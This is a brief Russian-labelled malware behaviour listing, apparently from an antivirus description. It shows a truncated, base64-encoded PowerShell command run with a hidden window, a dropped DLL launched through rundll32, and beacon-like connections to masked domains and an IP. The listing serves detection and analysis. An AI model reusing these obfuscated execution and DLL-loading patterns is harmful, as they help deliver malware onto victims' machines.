Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABlAEEAMwAgAD0AIABbAFQAWQBwAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAFQAZQBNAC4ASQBvAC4AJwAsACcAcwAnACwAJwBzAHkAJwAsACcAZABJAHIAZQBDAHQATwBSAHkAJwApACAAIA...
- %HOMEPATH%\tnwkyvd\rzr9729\lr8xwzk5t.dll
- 'wo###-words.com':443
- 'am###auto.com':443
- '19#.#50.118.7':443
- DNS ASK wo###-words.com
- DNS ASK am###auto.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABlAEEAMwAgAD0AIABbAFQAWQBwAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAFQAZQBNAC4ASQBvAC4AJwAsACcAcwAnACwAJwBzAHkAJwAsACcAZABJAHIAZQBDAHQATwBSAHkAJwApACAAIA...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Tnwkyvd\Rzr9729\Lr8xwzk5t.dll 0